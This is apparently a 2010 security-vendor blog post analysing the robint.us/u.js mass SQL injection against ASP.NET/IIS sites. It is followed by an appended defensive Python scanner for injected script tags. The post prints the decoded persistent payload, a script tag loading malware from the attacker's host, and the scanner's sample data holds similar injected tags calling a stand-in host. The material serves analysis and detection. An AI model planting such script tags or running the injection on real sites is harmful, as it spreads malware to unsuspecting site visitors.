June 15, 2010

Latest ROBINT.US/U.JS infects 114000 victims: Analyzed and Mitigated

Earlier last week, as reported by the SUCURI blog, the web was hit by an interesting malware injection built around a malicious script hosted at “robint.us/u.js”, which was injected into various applications. A search shows 114,000 results for infected web pages, which confirms that the attack was (unfortunately) successful.

The attack targeted specific functions that are present together when an ASP.NET application is hosted on an IIS web server. With today's advanced and automated hacking techniques (Google Dorks, scripting, anonymous proxies and others), any such vulnerability can unfortunately be exploited rapidly and effectively over a short period of time, causing major damage.

We decided to put this attack to the test by attacking one of our very own systems (yes, we do that!) and letting our SecureSphere product deal with it. The result? SecureSphere caught this attack vector and rendered it useless, keeping our WAF customer base safe.

How did it look? SecureSphere’s alert shows that our default security policies caught this attack attempt and effectively blocked it.


  1. The attack begins as an SQL injection on a parameter of an ASP.NET web page, exploiting a known insecure function in the database. The encoded payload is then decoded into <script src=hxxp://ww.robint.us/u.js></script> and stored in the database (and is thus persistent).
  2. A user then surfs to a web page that includes this script, which executes on the client side and downloads malware (see http://www.sophos.com/blogs/sophoslabs/?p=9941 for more detail).
  3. Attacker wins!
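
A defender-side check for the persistence described in step 1, as an added example that is not part of the original post: it scans stored text values for <script> tags whose src points at a host outside an allowlist, including the unquoted form shown above. The allowlist, table names and sample rows are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the only hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

class ScriptSrcCollector(HTMLParser):
    """Collects the src value of every <script> tag in a text fragment."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lowercased; values may be unquoted.
        if tag == "script":
            self.sources += [v.strip() for n, v in attrs if n == "src" and v]

def external_script_hosts(text):
    """Return the non-allowlisted hosts that script tags in text load from."""
    parser = ScriptSrcCollector()
    parser.feed(text)
    parser.close()
    hosts = []
    for src in parser.sources:
        try:
            host = (urlsplit(src).hostname or "").lower()
        except ValueError:
            host = "<unparseable>"  # malformed URL: report it, do not skip it
        # Relative URLs have no host and load from the site itself.
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            hosts.append(host)
    return hosts

def scan_rows(rows):
    """rows: iterable of (table, column, key, value); returns the findings."""
    return [(table, column, key, host)
            for table, column, key, value in rows
            for host in external_script_hosts(value or "")]

# Constructed sample data standing in for text columns read from the database.
SAMPLE_ROWS = [
    ("Products", "Description", 1, "Blue widget, 10cm"),
    ("Products", "Description", 2,
     "Red widget<script src=http://injected.example/u.js></script>"),
    ("News", "Body", 7, '<p>Hi</p><script src="/js/site.js"></script>'),
    ("News", "Title", 8, "Launch<SCRIPT SRC=//Injected.Example/u.js></SCRIPT>"),
    ("News", "Body", 9, '<script src="https://cdn.example.com/lib.js"></script>'),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print("external script in %s.%s (key %s): %s" % finding)
```

Rows 2 and 8 are flagged; the relative and allowlisted script tags in rows 7 and 9 are not.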
